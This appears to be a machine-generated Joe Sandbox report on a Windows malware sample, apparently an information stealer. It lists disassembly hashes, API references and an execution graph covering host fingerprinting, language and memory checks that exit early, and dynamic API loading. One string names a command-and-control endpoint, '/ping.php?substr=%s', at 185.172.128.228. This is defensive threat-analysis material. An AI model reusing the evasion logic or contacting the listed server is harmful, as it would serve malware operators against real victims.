                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog$Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                              • String ID: ,jC
                                                                                                                                                                                                                              • API String ID: 420165198-3201430929
                                                                                                                                                                                                                              • Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
                                                                                                                                                                                                                              • Instruction ID: 96cfa0aa3aace3b7ce1ea7dc7a4f773ae76ec4622010d3583d694d77788a6886
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A31EBB5E01119EBDB14EF98D995AEDF7B4FF58304F1081AAE405A3640DB74AE08CF61
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00417217
                                                                                                                                                                                                                              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                                                                              • String ID: -@
                                                                                                                                                                                                                              • API String ID: 2279764990-2564449678
                                                                                                                                                                                                                              • Opcode ID: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
                                                                                                                                                                                                                              • Instruction ID: 290a678ed3add9fd0faa91afd9d0ee705692a8110a20fb2286b59343c35ba588
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B110A33A041209BAF369E19DC809DB73B5EB847247164172FD19AB354DA34DC86C6D9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                                              • String ID: /ping.php?substr=%s$185.172.128.228
                                                                                                                                                                                                                              • API String ID: 3519838083-3577573015
                                                                                                                                                                                                                              • Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
                                                                                                                                                                                                                              • Instruction ID: ab55ff56240711a7d24a344f600b9cc3ff947d0dd5a1044b8b576a70286b3ba7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6701CC72A05515ABD704EF98DC44BBEB7B9FF44614F1045AAF809E3240D3B9AA40CBE1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                                              • String ID: /ping.php?substr=%s$185.172.128.228
                                                                                                                                                                                                                              • API String ID: 3519838083-3577573015
                                                                                                                                                                                                                              • Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
                                                                                                                                                                                                                              • Instruction ID: 7b6dfb3f8f1c8d27c76164ee4eac5e21074d72dd8ad347809e0f3e64fbe8a7e5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F01C472A01114BBDB04AF899C41BAEF769EF45315F10013FF405E3292D3789E41C6E9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                              • std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                • Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
                                                                                                                                                                                                                                • Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
                                                                                                                                                                                                                                • Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
                                                                                                                                                                                                                                • Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
                                                                                                                                                                                                                                • Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                              • String ID: T*@
                                                                                                                                                                                                                              • API String ID: 4198646248-2370032326
                                                                                                                                                                                                                              • Opcode ID: 3ec9199d66afed3907134f97eebd3b9b00bf7a97696591750704becf4680ddf6
                                                                                                                                                                                                                              • Instruction ID: f5781f1056de0421007c94b05f43b79da385089699a731dc7870890d3004fbc1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ec9199d66afed3907134f97eebd3b9b00bf7a97696591750704becf4680ddf6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B21B0B5A00A06AFC305DF6AD580995FBF4FF49314B41826FE809D7B50E774A924CFA4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00404373
                                                                                                                                                                                                                                • Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47
                                                                                                                                                                                                                              • __Getcoll.LIBCPMT ref: 004043CF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog$Getcoll
                                                                                                                                                                                                                              • String ID: u@@
                                                                                                                                                                                                                              • API String ID: 206117190-736001340
                                                                                                                                                                                                                              • Opcode ID: 270736e8c7e434f475df5a6f2add70e77253c20f60e327508c33da834ea4415e
                                                                                                                                                                                                                              • Instruction ID: 69c11f36173d25db8645085f4dff982521935f2d07d38959ddb20a2960a7de4d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 270736e8c7e434f475df5a6f2add70e77253c20f60e327508c33da834ea4415e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B21170B19012099FCB04EFA9D581A9EB7B4FF44304F10843FE555BB281DB789A44CB99
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 05B7A9D1
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 05B7A9DF
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 05B7AA3A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1717984340-0
                                                                                                                                                                                                                              • Opcode ID: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
                                                                                                                                                                                                                              • Instruction ID: 16f2a27f61cc8722539087949540980805dce85b7b7eb9254fc29e965b684b52
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2541B83160464EAFCB61CF64C948B7E7BA5FF41310F1541E9F97AA71A0D730A901C751
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A76A
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041A778
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A7D3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1717984340-0
                                                                                                                                                                                                                              • Opcode ID: 6e686536444b783a84211067d30db666084dfc2c0494af9a85d7f06e58f7e852
                                                                                                                                                                                                                              • Instruction ID: a04565de271e9a0d08a9f39f26722ecfcdc9a59ce40c97fd2178d4ba0242ee74
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e686536444b783a84211067d30db666084dfc2c0494af9a85d7f06e58f7e852
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5541E934602246AFCF219F69C9447FB7BB4EF01310F14416AEC6997291D738CDA2C75A
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:4.7%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:2.4%
                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                              Total number of Limit Nodes:41
                                                                                                                                                                                                                              execution_graph 70250 401150 70257 414400 GetProcessHeap HeapAlloc GetComputerNameA 70250->70257 70252 40115e 70253 40118c 70252->70253 70259 4143c0 GetProcessHeap HeapAlloc GetUserNameA 70252->70259 70255 401177 70255->70253 70256 401184 ExitProcess 70255->70256 70258 414436 70257->70258 70258->70252 70259->70255 70260 4136b0 70303 402130 70260->70303 70278 4136f0 70279 414400 3 API calls 70278->70279 70280 413703 70279->70280 70437 416fb0 70280->70437 70282 413724 70283 416fb0 4 API calls 70282->70283 70284 41372b 70283->70284 70285 416fb0 4 API calls 70284->70285 70286 413732 70285->70286 70287 416fb0 4 API calls 70286->70287 70288 413739 70287->70288 70289 416fb0 4 API calls 70288->70289 70290 413740 70289->70290 70445 416ea0 70290->70445 70292 4137cc 70449 4135e0 GetSystemTime 70292->70449 70293 413749 70293->70292 70295 413782 OpenEventA 70293->70295 70297 4137b5 CloseHandle Sleep 70295->70297 70298 413799 70295->70298 70301 4137ca 70297->70301 70302 4137a1 CreateEventA 70298->70302 70301->70293 70302->70292 70595 4043b0 LocalAlloc 70303->70595 70306 4043b0 2 API calls 70307 40215d 70306->70307 70308 4043b0 2 API calls 70307->70308 70309 402176 70308->70309 70310 4043b0 2 API calls 70309->70310 70311 40218f 70310->70311 70312 4043b0 2 API calls 70311->70312 70313 4021a8 70312->70313 70314 4043b0 2 API calls 70313->70314 70315 4021c1 70314->70315 70316 4043b0 2 API calls 70315->70316 70317 4021da 70316->70317 70318 4043b0 2 API calls 70317->70318 70319 4021f3 70318->70319 70320 4043b0 2 API calls 70319->70320 70321 40220c 70320->70321 70322 4043b0 2 API calls 70321->70322 70323 402225 70322->70323 70324 4043b0 2 API calls 70323->70324 70325 40223e 70324->70325 70326 4043b0 2 API calls 70325->70326 70327 402257 70326->70327 70328 4043b0 2 API calls 70327->70328 70329 402270 70328->70329 70330 4043b0 2 API calls 70329->70330 70331 402289 70330->70331 70332 4043b0 2 API calls 70331->70332 70333 4022a2 70332->70333 70334 4043b0 2 API calls 70333->70334 70335 4022bb 70334->70335 70336 4043b0 2 API calls 70335->70336 70337 4022d4 70336->70337 70338 4043b0 2 API calls 70337->70338 70339 4022ed 70338->70339 70340 4043b0 2 API calls 70339->70340 70341 402306 70340->70341 70342 4043b0 2 API calls 70341->70342 70343 40231f 70342->70343 70344 4043b0 2 API calls 70343->70344 70345 402338 70344->70345 70346 4043b0 2 API calls 70345->70346 70347 402351 70346->70347 70348 4043b0 2 API calls 70347->70348 70349 40236a 70348->70349 70350 4043b0 2 API calls 70349->70350 70351 402383 70350->70351 70352 4043b0 2 API calls 70351->70352 70353 40239c 70352->70353 70354 4043b0 2 API calls 70353->70354 70355 4023b5 70354->70355 70356 4043b0 2 API calls 70355->70356 70357 4023ce 70356->70357 70358 4043b0 2 API calls 70357->70358 70359 4023e7 70358->70359 70360 4043b0 2 API calls 70359->70360 70361 402400 70360->70361 70362 4043b0 2 API calls 70361->70362 70363 402419 70362->70363 70364 4043b0 2 API calls 70363->70364 70365 402432 70364->70365 70366 4043b0 2 API calls 70365->70366 70367 40244b 70366->70367 70368 4043b0 2 API calls 70367->70368 70369 402464 70368->70369 70370 4043b0 2 API calls 70369->70370 70371 40247d 70370->70371 70372 4043b0 2 API calls 70371->70372 70373 402496 70372->70373 70374 4043b0 2 API calls 70373->70374 70375 4024af 70374->70375 70376 4043b0 2 API calls 70375->70376 70377 4024c8 70376->70377 70378 4043b0 2 API calls 70377->70378 70379 4024e1 70378->70379 70380 4043b0 2 API calls 70379->70380 70381 4024fa 70380->70381 70382 4043b0 2 API calls 70381->70382 70383 402513 70382->70383 70384 4043b0 2 API calls 70383->70384 70385 40252c 70384->70385 70386 4043b0 2 API calls 70385->70386 70387 402545 70386->70387 70388 4043b0 2 API calls 70387->70388 70389 40255e 70388->70389 70390 415ed0 70389->70390 70599 415dc0 GetPEB 70390->70599 70392 415ed8 70393 416103 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 70392->70393 70394 415eea 70392->70394 70395 416164 GetProcAddress 70393->70395 70396 41617d 70393->70396 70397 415efc 21 API calls 70394->70397 70395->70396 70398 4161b6 70396->70398 70399 416186 GetProcAddress GetProcAddress 70396->70399 70397->70393 70400 4161d8 70398->70400 70401 4161bf GetProcAddress 70398->70401 70399->70398 70402 4161e1 GetProcAddress 70400->70402 70403 4161f9 70400->70403 70401->70400 70402->70403 70404 4136c0 70403->70404 70405 416202 GetProcAddress GetProcAddress 70403->70405 70406 416d40 70404->70406 70405->70404 70407 416d50 70406->70407 70408 4136cd 70407->70408 70409 416d7e lstrcpy 70407->70409 70410 401190 70408->70410 70409->70408 70411 4011a8 70410->70411 70412 4011d7 70411->70412 70413 4011cf ExitProcess 70411->70413 70414 401120 GetSystemInfo 70412->70414 70415 401144 70414->70415 70416 40113c ExitProcess 70414->70416 70417 4010d0 GetCurrentProcess VirtualAllocExNuma 70415->70417 70418 401101 ExitProcess 70417->70418 70419 401109 70417->70419 70600 401060 VirtualAlloc 70419->70600 70422 4011e0 70604 415090 70422->70604 70425 401209 __aulldiv 70426 40125a 70425->70426 70427 401252 ExitProcess 70425->70427 70428 413430 GetUserDefaultLangID 70426->70428 70429 413493 GetUserDefaultLangID 70428->70429 70430 413452 70428->70430 70436 4143c0 GetProcessHeap HeapAlloc GetUserNameA 70429->70436 70430->70429 70431 413481 ExitProcess 70430->70431 70432 413463 ExitProcess 70430->70432 70433 413477 ExitProcess 70430->70433 70434 41348b ExitProcess 70430->70434 70435 41346d ExitProcess 70430->70435 70434->70429 70436->70278 70606 416d10 70437->70606 70439 416fc1 lstrlen 70441 416fe0 70439->70441 70440 417018 70607 416da0 70440->70607 70441->70440 70443 416ffa lstrcpy lstrcat 70441->70443 70443->70440 70444 417024 70444->70282 70446 416ebb 70445->70446 70447 416f0b 70446->70447 70448 416ef9 lstrcpy 70446->70448 70447->70293 70448->70447 70611 4134e0 70449->70611 70451 41364e 70452 413658 sscanf 70451->70452 70640 416e00 70452->70640 70454 41366a SystemTimeToFileTime SystemTimeToFileTime 70455 4136a0 70454->70455 70456 41368e 70454->70456 70458 412bb0 70455->70458 70456->70455 70457 413698 ExitProcess 70456->70457 70459 412bbd 70458->70459 70460 416d40 lstrcpy 70459->70460 70461 412bcb 70460->70461 70642 416e20 lstrlen 70461->70642 70464 416e20 2 API calls 70465 412bed 70464->70465 70466 416e20 2 API calls 70465->70466 70467 412bfa 70466->70467 70468 416e20 2 API calls 70467->70468 70469 412c07 70468->70469 70646 402590 70469->70646 70474 416e20 2 API calls 70475 412cd5 70474->70475 70476 416fb0 4 API calls 70475->70476 70477 412ceb 70476->70477 70478 416ea0 lstrcpy 70477->70478 70479 412cf4 70478->70479 70480 416d40 lstrcpy 70479->70480 70481 412d11 70480->70481 70482 416fb0 4 API calls 70481->70482 70483 412d2a 70482->70483 70484 416ea0 lstrcpy 70483->70484 70485 412d36 70484->70485 70486 416fb0 4 API calls 70485->70486 70487 412d5a 70486->70487 70488 416ea0 lstrcpy 70487->70488 70489 412d66 70488->70489 70490 416d40 lstrcpy 70489->70490 70491 412d8b 70490->70491 71290 4141c0 GetWindowsDirectoryA 70491->71290 70494 416da0 lstrcpy 70495 412da2 70494->70495 71300 404540 70495->71300 70497 412da8 71445 40fae0 70497->71445 70499 412db0 70500 416d40 lstrcpy 70499->70500 70501 412dd3 70500->70501 71463 401500 70501->71463 70505 412de7 71618 40f3b0 70505->71618 70507 412def 70508 416d40 lstrcpy 70507->70508 70509 412e13 70508->70509 70510 401500 lstrcpy 70509->70510 70511 412e21 70510->70511 70512 405610 37 API calls 70511->70512 70513 412e27 70512->70513 71625 40f200 70513->71625 70515 412e2f 70516 401500 lstrcpy 70515->70516 70517 412e40 70516->70517 71635 40fd10 70517->71635 70519 412e45 70520 416d40 lstrcpy 70519->70520 70521 412e5e 70520->70521 71979 404c70 GetProcessHeap RtlAllocateHeap InternetOpenA 70521->71979 70523 412e63 70524 401500 lstrcpy 70523->70524 70525 412ed0 70524->70525 71986 40ef80 70525->71986 70527 412ed5 70528 416d40 lstrcpy 70527->70528 70529 412ef8 70528->70529 70530 401500 lstrcpy 70529->70530 70531 412f06 70530->70531 70596 4043db 70595->70596 70597 4043ec strlen 70596->70597 70598 402144 70596->70598 70597->70596 70598->70306 70599->70392 70602 401082 moneypunct 70600->70602 70601 4010bd 70601->70422 70602->70601 70603 4010a2 VirtualFree 70602->70603 70603->70601 70605 4011f3 GlobalMemoryStatusEx 70604->70605 70605->70425 70606->70439 70608 416dc2 70607->70608 70609 416dec 70608->70609 70610 416dda lstrcpy 70608->70610 70609->70444 70610->70609 70612 416d40 lstrcpy 70611->70612 70613 4134f3 70612->70613 70614 416fb0 4 API calls 70613->70614 70615 413505 70614->70615 70616 416ea0 lstrcpy 70615->70616 70617 41350e 70616->70617 70618 416fb0 4 API calls 70617->70618 70619 413527 70618->70619 70620 416ea0 lstrcpy 70619->70620 70621 413530 70620->70621 70622 416fb0 4 API calls 70621->70622 70623 41354a 70622->70623 70624 416ea0 lstrcpy 70623->70624 70625 413553 70624->70625 70626 416fb0 4 API calls 70625->70626 70627 41356c 70626->70627 70628 416ea0 lstrcpy 70627->70628 70629 413575 70628->70629 70630 416fb0 4 API calls 70629->70630 70631 41358f 70630->70631 70632 416ea0 lstrcpy 70631->70632 70633 413598 70632->70633 70634 416fb0 4 API calls 70633->70634 70635 4135b3 70634->70635 70636 416ea0 lstrcpy 70635->70636 70637 4135bc 70636->70637 70638 416da0 lstrcpy 70637->70638 70639 4135d0 70638->70639 70639->70451 70641 416e12 70640->70641 70641->70454 70643 416e3f 70642->70643 70644 412be0 70643->70644 70645 416e7b lstrcpy 70643->70645 70644->70464 70645->70644 70647 4043b0 2 API calls 70646->70647 70648 4025a4 70647->70648 70649 4043b0 2 API calls 70648->70649 70650 4025bd 70649->70650 70651 4043b0 2 API calls 70650->70651 70652 4025d6 70651->70652 70653 4043b0 2 API calls 70652->70653 70654 4025ef 70653->70654 70655 4043b0 2 API calls 70654->70655 70656 402608 70655->70656 70657 4043b0 2 API calls 70656->70657 70658 402621 70657->70658 70659 4043b0 2 API calls 70658->70659 70660 40263a 70659->70660 70661 4043b0 2 API calls 70660->70661 70662 402653 70661->70662 70663 4043b0 2 API calls 70662->70663 70664 40266c 70663->70664 70665 4043b0 2 API calls 70664->70665 70666 402685 70665->70666 70667 4043b0 2 API calls 70666->70667 70668 40269e 70667->70668 70669 4043b0 2 API calls 70668->70669 70670 4026b7 70669->70670 70671 4043b0 2 API calls 70670->70671 70672 4026d0 70671->70672 70673 4043b0 2 API calls 70672->70673 70674 4026e9 70673->70674 70675 4043b0 2 API calls 70674->70675 70676 402702 70675->70676 70677 4043b0 2 API calls 70676->70677 70678 40271b 70677->70678 70679 4043b0 2 API calls 70678->70679 70680 402734 70679->70680 70681 4043b0 2 API calls 70680->70681 70682 40274d 70681->70682 70683 4043b0 2 API calls 70682->70683 70684 402766 70683->70684 70685 4043b0 2 API calls 70684->70685 70686 40277f 70685->70686 70687 4043b0 2 API calls 70686->70687 70688 402798 70687->70688 70689 4043b0 2 API calls 70688->70689 70690 4027b1 70689->70690 70691 4043b0 2 API calls 70690->70691 70692 4027ca 70691->70692 70693 4043b0 2 API calls 70692->70693 70694 4027e3 70693->70694 70695 4043b0 2 API calls 70694->70695 70696 4027fc 70695->70696 70697 4043b0 2 API calls 70696->70697 70698 402815 70697->70698 70699 4043b0 2 API calls 70698->70699 70700 40282e 70699->70700 70701 4043b0 2 API calls 70700->70701 70702 402847 70701->70702 70703 4043b0 2 API calls 70702->70703 70704 402860 70703->70704 70705 4043b0 2 API calls 70704->70705 70706 402879 70705->70706 70707 4043b0 2 API calls 70706->70707 70708 402892 70707->70708 70709 4043b0 2 API calls 70708->70709 70710 4028ab 70709->70710 70711 4043b0 2 API calls 70710->70711 70712 4028c4 70711->70712 70713 4043b0 2 API calls 70712->70713 70714 4028dd 70713->70714 70715 4043b0 2 API calls 70714->70715 70716 4028f6 70715->70716 70717 4043b0 2 API calls 70716->70717 70718 40290f 70717->70718 70719 4043b0 2 API calls 70718->70719 70720 402928 70719->70720 70721 4043b0 2 API calls 70720->70721 70722 402941 70721->70722 70723 4043b0 2 API calls 70722->70723 70724 40295a 70723->70724 70725 4043b0 2 API calls 70724->70725 70726 402973 70725->70726 70727 4043b0 2 API calls 70726->70727 70728 40298c 70727->70728 70729 4043b0 2 API calls 70728->70729 70730 4029a5 70729->70730 70731 4043b0 2 API calls 70730->70731 70732 4029be 70731->70732 70733 4043b0 2 API calls 70732->70733 70734 4029d7 70733->70734 70735 4043b0 2 API calls 70734->70735 70736 4029f0 70735->70736 70737 4043b0 2 API calls 70736->70737 70738 402a09 70737->70738 70739 4043b0 2 API calls 70738->70739 70740 402a22 70739->70740 70741 4043b0 2 API calls 70740->70741 70742 402a3b 70741->70742 70743 4043b0 2 API calls 70742->70743 70744 402a54 70743->70744 70745 4043b0 2 API calls 70744->70745 70746 402a6d 70745->70746 70747 4043b0 2 API calls 70746->70747 70748 402a86 70747->70748 70749 4043b0 2 API calls 70748->70749 70750 402a9f 70749->70750 70751 4043b0 2 API calls 70750->70751 70752 402ab8 70751->70752 70753 4043b0 2 API calls 70752->70753 70754 402ad1 70753->70754 70755 4043b0 2 API calls 70754->70755 70756 402aea 70755->70756 70757 4043b0 2 API calls 70756->70757 70758 402b03 70757->70758 70759 4043b0 2 API calls 70758->70759 70760 402b1c 70759->70760 70761 4043b0 2 API calls 70760->70761 70762 402b35 70761->70762 70763 4043b0 2 API calls 70762->70763 70764 402b4e 70763->70764 70765 4043b0 2 API calls 70764->70765 70766 402b67 70765->70766 70767 4043b0 2 API calls 70766->70767 70768 402b80 70767->70768 70769 4043b0 2 API calls 70768->70769 70770 402b99 70769->70770 70771 4043b0 2 API calls 70770->70771 70772 402bb2 70771->70772 70773 4043b0 2 API calls 70772->70773 70774 402bcb 70773->70774 70775 4043b0 2 API calls 70774->70775 70776 402be4 70775->70776 70777 4043b0 2 API calls 70776->70777 70778 402bfd 70777->70778 70779 4043b0 2 API calls 70778->70779 70780 402c16 70779->70780 70781 4043b0 2 API calls 70780->70781 70782 402c2f 70781->70782 70783 4043b0 2 API calls 70782->70783 70784 402c48 70783->70784 70785 4043b0 2 API calls 70784->70785 70786 402c61 70785->70786 70787 4043b0 2 API calls 70786->70787 70788 402c7a 70787->70788 70789 4043b0 2 API calls 70788->70789 70790 402c93 70789->70790 70791 4043b0 2 API calls 70790->70791 70792 402cac 70791->70792 70793 4043b0 2 API calls 70792->70793 70794 402cc5 70793->70794 70795 4043b0 2 API calls 70794->70795 70796 402cde 70795->70796 70797 4043b0 2 API calls 70796->70797 70798 402cf7 70797->70798 70799 4043b0 2 API calls 70798->70799 70800 402d10 70799->70800 70801 4043b0 2 API calls 70800->70801 70802 402d29 70801->70802 70803 4043b0 2 API calls 70802->70803 70804 402d42 70803->70804 70805 4043b0 2 API calls 70804->70805 70806 402d5b 70805->70806 70807 4043b0 2 API calls 70806->70807 70808 402d74 70807->70808 70809 4043b0 2 API calls 70808->70809 70810 402d8d 70809->70810 70811 4043b0 2 API calls 70810->70811 70812 402da6 70811->70812 70813 4043b0 2 API calls 70812->70813 70814 402dbf 70813->70814 70815 4043b0 2 API calls 70814->70815 70816 402dd8 70815->70816 70817 4043b0 2 API calls 70816->70817 70818 402df1 70817->70818 70819 4043b0 2 API calls 70818->70819 70820 402e0a 70819->70820 70821 4043b0 2 API calls 70820->70821 70822 402e23 70821->70822 70823 4043b0 2 API calls 70822->70823 70824 402e3c 70823->70824 70825 4043b0 2 API calls 70824->70825 70826 402e55 70825->70826 70827 4043b0 2 API calls 70826->70827 70828 402e6e 70827->70828 70829 4043b0 2 API calls 70828->70829 70830 402e87 70829->70830 70831 4043b0 2 API calls 70830->70831 70832 402ea0 70831->70832 70833 4043b0 2 API calls 70832->70833 70834 402eb9 70833->70834 70835 4043b0 2 API calls 70834->70835 70836 402ed2 70835->70836 70837 4043b0 2 API calls 70836->70837 70838 402eeb 70837->70838 70839 4043b0 2 API calls 70838->70839 70840 402f04 70839->70840 70841 4043b0 2 API calls 70840->70841 70842 402f1d 70841->70842 70843 4043b0 2 API calls 70842->70843 70844 402f36 70843->70844 70845 4043b0 2 API calls 70844->70845 70846 402f4f 70845->70846 70847 4043b0 2 API calls 70846->70847 70848 402f68 70847->70848 70849 4043b0 2 API calls 70848->70849 70850 402f81 70849->70850 70851 4043b0 2 API calls 70850->70851 70852 402f9a 70851->70852 70853 4043b0 2 API calls 70852->70853 70854 402fb3 70853->70854 70855 4043b0 2 API calls 70854->70855 70856 402fcc 70855->70856 70857 4043b0 2 API calls 70856->70857 70858 402fe5 70857->70858 70859 4043b0 2 API calls 70858->70859 70860 402ffe 70859->70860 70861 4043b0 2 API calls 70860->70861 70862 403017 70861->70862 70863 4043b0 2 API calls 70862->70863 70864 403030 70863->70864 70865 4043b0 2 API calls 70864->70865 70866 403049 70865->70866 70867 4043b0 2 API calls 70866->70867 70868 403062 70867->70868 70869 4043b0 2 API calls 70868->70869 70870 40307b 70869->70870 70871 4043b0 2 API calls 70870->70871 70872 403094 70871->70872 70873 4043b0 2 API calls 70872->70873 70874 4030ad 70873->70874 70875 4043b0 2 API 